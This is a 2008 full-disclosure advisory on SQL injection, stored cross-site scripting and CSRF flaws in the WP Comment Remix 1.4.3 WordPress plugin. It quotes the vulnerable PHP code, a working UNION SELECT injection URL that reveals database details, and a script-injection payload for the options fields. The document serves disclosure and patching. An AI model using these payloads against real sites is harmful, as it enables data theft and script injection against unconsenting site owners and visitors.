wpcomment-multi.txt

`___________  
ChX Security |  
Advisory #3 |  
==========  
  
-> "WP Comment Remix 1.4.3 Multiple Vulnerabilities" <-  
  
_________________  
Advisory Information |  
===============  
Title: WP Comment Remix 1.4.3 Multiple Vulnerabilities  
Author: g30rg3_x <g30rg3x_at_chxsecurity_dot_org>  
Advisory URL: http://chxsecurity.org/advisories/adv-3-full.txt  
Date of last update: 2008-10-13  
CVE Name: --  
  
____________________  
Vulnerability Information |  
==================  
Software: WP Comment Remix  
Version: 1.4.3  
From: Remote  
Severity: Extremely Critical  
Impact:  
Manipulation of data  
Cross-Site Scripting  
Type of Advisory: Full Disclosure  
  
_________________  
Software Description |  
===============  
WP Comment Remix adds a plethora of new options and features to  
Wordpress. From Reply and Quote links  
for commenters, to a full upgrade to the edit comments pages in the  
admin panel, WPCR will save you  
time and effort when running your blog.  
  
____________________  
Vulnerability Description |  
==================  
WP Comment Remix has multiple vulnerabilities which allow remote  
attackers to conduct SQL Injection,  
Cross-Site Scripting and Cross-Site Request Forgery attacks.  
The SQL Injection is possible due to lack of filtration on the comment  
post ID variable in the AJAX  
Comments script.  
The Cross-Site Scripting is possible due to lack of filtration and  
escaping on several stored  
options.  
The Cross-Site Request Forgery is caused by the lack of the WordPress  
Nonces on the options panel form.  
  
__________________  
Technical Description |  
================  
* SQL Injection *  
Inside the script "ajax_comments.php" (around lines 27 to 29):  
  
/---------------------  
$id = $_GET['p'];  
  
$comments = $wpdb->get_results("SELECT * FROM $wpdb->comments WHERE  
comment_post_ID = $id AND comment_approved != 'spam' ORDER BY  
comment_date DESC");  
----------------------/  
As you can see in the presented code, the value of $id is taken from  
HTTP GET p variable and then $id is later used  
inside the SQL Query of get_results method from the $wpdb object  
(which allow WordPress plugins developers to pull  
multiple row results from the database), so we can inject SQL code and  
the data will later be show as comment data  
on the script.  
  
As and a example we can inject something like this:  
/----------------------  
ajax_comments.php?p=0 UNION SELECT  
1,2,user(),4,5,6,7,8,CONCAT(database(),0x3C62723E,version()),10,11,12,13,14,15  
--  
-----------------------/  
To obtain the MySQL user, Database name and MySQL version used on the server.  
  
  
  
* Cross-Site Scripting *  
Inside the script "wpcommentremix.php" (around lines 611 to 781)  
  
(The next code is truncated to only show the vulnerable parts of the code)  
/----------------------  
$options['replytotext'] = $_POST['replytotext'];  
...  
$options['quotetext'] = $_POST['quotetext'];  
$options['originallypostedby'] = $_POST['originallypostedby'];  
$options['sep'] = $_POST['sep'];  
$options['maxtags'] = $_POST['maxtags'];  
...  
$options['tagsep'] = $_POST['tagsep'];  
$options['tagheadersep'] = $_POST['tagheadersep'];  
$options['taglabel'] = $_POST['taglabel'];  
$options['tagheaderlabel'] = $_POST['tagheaderlabel'];  
...  
<input type="text" name="replytotext" value="<?=$options['replytotext']?>"><br/>  
...  
<input type="text" name="quotetext" value="<?=$options['quotetext']?>"><br/>  
...  
<input type="textbox" name="originallypostedby"  
value='<?=$options['originallypostedby'];?>' />  
...  
<input type="text" name="sep" value="<?=$options['sep']?>"><br/>  
...  
<input type="text" name="taglabel" value="<?=$options['taglabel']?>"><br/>  
...  
<input type="text" name="tagsep" value="<?=$options['tagsep']?>"><br/>  
...  
<input type="text" name="maxtags" value="<?=$options['maxtags']?>"><br/>  
...  
<input type="text" name="tagheaderlabel"  
value="<?=$options['tagheaderlabel']?>"><br/>  
...  
<input type="text" name="tagheadersep"  
value="<?=$options['tagheadersep']?>"><br/>  
-----------------------/  
This variables totally lack of filtration and escaping so if we store  
something like this...  
  
/----------------------  
5"><script>alert(String.fromCharCode(88,83,83));</script><input  
type=hidden name=foo id="  
-----------------------/  
When the data is retreived to be show on the dashboard options panel  
then the "bad code"  
is rendered and the attack is conducted.  
  
NOTE: There are some input variables (like replytotext) that are also  
rendered to the public viewers, so is  
possibly to inject "malicious code" outside of the dashboard options  
panel of the plugin.  
  
  
  
* Cross-Site Request Forgery *  
The form generated by the wpcr_do_options_page function  
(wpcommentsremix.php at line 585) totally  
lacks from the WP Nonces (which prevent this type of attacks) and only  
uses on a simple hidden input  
named "wpcr_hidden_form_input" with a value of "1".  
And since this and a "attacker" can force a user to submit data to the  
form; this combined with  
and a Cross-Site Scripting vulnerability (which was discussed  
previously) can turn this vulnerability  
very dangerous.  
  
______________  
Proof of Concept |  
=============  
Can be downloaded from here:  
http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip  
  
_______  
Solution |  
======  
Upgrade to version 1.4.4  
  
_______  
Timeline |  
=======  
Bug Found: 16/09/2008  
Vendor Contact: 20/09/2008  
Vendor Response: 23/09/2008  
Public Disclosure: 13/10/2008  
  
  
ChX Security  
http://chxsecurity.org/  
(c) 2008  
  
--  
Original: http://chxsecurity.org/advisories/adv-3-full.txt  
`